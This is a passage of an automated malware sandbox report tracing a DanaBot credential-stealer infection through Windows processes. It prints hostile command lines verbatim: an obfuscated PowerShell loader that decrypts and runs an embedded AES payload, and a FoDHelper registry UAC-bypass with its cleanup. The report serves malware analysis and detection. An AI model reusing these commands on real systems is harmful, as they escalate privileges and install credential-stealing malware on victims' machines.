                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D20530BC9EF65B371EDFBA73316E25945A063D7A28BE0F4070D89BD71D08F1EC1392620E3F9E825A74316A5E9B8A7A70C3FC14D385B0D9F2A32F105EC66DC0B66EF10CB54D88BC0C2EC3C6D8B685C4A14BBFAF410E05F6F6457D7F9DA84102A348A56A4485CC1461217FCCC817704BD60EAE9427F8F126249479DA465DD0953880B50203DFB5DF97FEC094E492A4B417CF22BF841934ED24A0B0560EBF6DC9556D5FFD9549F51C870531BFA2BCFA700AD9EF423262F03922066B86DB35AA36FA7B763DCDD7176D82F2B7AF30B64970FA776C81DE60217D00F4B33DE2484A7526D3027184AB3318A44AC8E56A23A1E7AE21C561807980C57498B0BF9EF2CB743BB88450F5E4C7BFD72EF1467CDC3C67606AB945368DED820465416BA2A5775E52744944EAC6DA3F107DC69F469ACC6AF28A5520C7CF8FF549A145DC7A79D1CA66B1BB307B8BFE97041FB1F1CD07CA9DF7DDFD418D990B4FFF0ECB1DBDCFB5AE09034756A206FCED160FB71D4F142B6F97A20C8E1DF317F55051E54E9076BE72CCAA9E3538A276B4BA3BE1FA5C23EF88B84FED88D1E3F4D6ACF1A58A49CB7C35A80F797F9F1E55D3A01B4D42B956350FAF932B55519B6F7E70D2A0C998AA611AED9BEA8A07706D8B5704FC697F2C676DC5C4C1093EFEF23707B4BD489239CB80D30338E');$PYGob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283)
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:03:05:13
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:18
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:19
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:20
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:21
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:FoDHelper.exe
                                                                      Imagebase:0x7ff6f12a0000
                                                                      File size:49'664 bytes
                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:22
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:23
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:24
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:25
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:26
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell.exe -w 1 -ep Unrestricted -nop
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:27
                                                                      Start time:03:05:17
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:28
                                                                      Start time:03:05:18
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:29
                                                                      Start time:03:05:19
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:30
                                                                      Start time:03:05:19
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:33
                                                                      Start time:03:05:24
                                                                      Start date:27/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
                                                                      Imagebase:0x7ff702560000
                                                                      File size:5'641'176 bytes
                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:34
                                                                      Start time:04:07:55
                                                                      Start date:27/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                      Imagebase:0x7ff6c3ff0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:35
                                                                      Start time:04:07:55
                                                                      Start date:27/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                      Imagebase:0x7ff6c3ff0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:38
                                                                      Start time:04:08:02
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:39
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:40
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:41
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:FoDHelper.exe
                                                                      Imagebase:0x7ff6f12a0000
                                                                      File size:49'664 bytes
                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:42
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:43
                                                                      Start time:04:08:03
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:44
                                                                      Start time:04:08:04
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:45
                                                                      Start time:04:08:04
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:46
                                                                      Start time:04:08:04
                                                                      Start date:27/12/2024
                                                                      Path:C:\Users\user\AppData\Roaming\mama.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\mama.exe
                                                                      Imagebase:0x400000
                                                                      File size:4'277'248 bytes
                                                                      MD5 hash:72B6B07175EF611CE7DAA959A1248AAE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 71%, ReversingLabs
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:47
                                                                      Start time:04:08:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:48
                                                                      Start time:04:08:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:49
                                                                      Start time:04:08:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:50
                                                                      Start time:04:08:10
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                                      Imagebase:0x410000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:51
                                                                      Start time:04:08:10
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:52
                                                                      Start time:04:08:10
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                                      Imagebase:0x4a0000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FFAACA233B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1315575661.00007FFAACA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ffaaca20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction ID: 620b3dba007e650f80db8260b08a0d663cb6f0e19fb0176174f2a951e936a351
                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction Fuzzy Hash: 8F01A77011CB0C8FDB48EF0CE451AB5B3E0FB85320F10052DE58AC3661DA32E882CB41

                                                                        Non-executed Functions

                                                                        Function 00007FFAACA22785 Relevance: .3, Instructions: 345COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1315575661.00007FFAACA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ffaaca20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdbda93afecdc460aa4e43a4519c41d6a6c80fcf4dd81c7ded2077d3b20e5549
                                                                        • Instruction ID: 5828addfcdfdeda1588e7044b1a7a439809d74adcca9d931ee08ef3e2c5f699f
                                                                        • Opcode Fuzzy Hash: cdbda93afecdc460aa4e43a4519c41d6a6c80fcf4dd81c7ded2077d3b20e5549
                                                                        • Instruction Fuzzy Hash: 8FB1656791E7D78FE312976CA8A54F63F60EF53624B0943F3D0CA8A0A3F915540AC6D1

                                                                        Executed Functions

                                                                        Function 0000020454DA1109 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669548550.0000020454DA1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020454DA1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_20454da1000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X(!P
                                                                        • API String ID: 0-4267158302
                                                                        • Opcode ID: 70be6f038ebe1ecf87541da9a1c831808360e08eef8c1910c422574e589d882a
                                                                        • Instruction ID: 318830515fe6935c835cefbe38d52ab69dc08f16f365699db754f04808605335
                                                                        • Opcode Fuzzy Hash: 70be6f038ebe1ecf87541da9a1c831808360e08eef8c1910c422574e589d882a
                                                                        • Instruction Fuzzy Hash: 9E4126A161DB880FE799A66D089A3653FD1DBF6348FC541DBC444CF1D3E104CC8A8342
                                                                        Function 0000020454DA220C Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669519633.0000020454DA2000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020454DA2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_20454da2000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
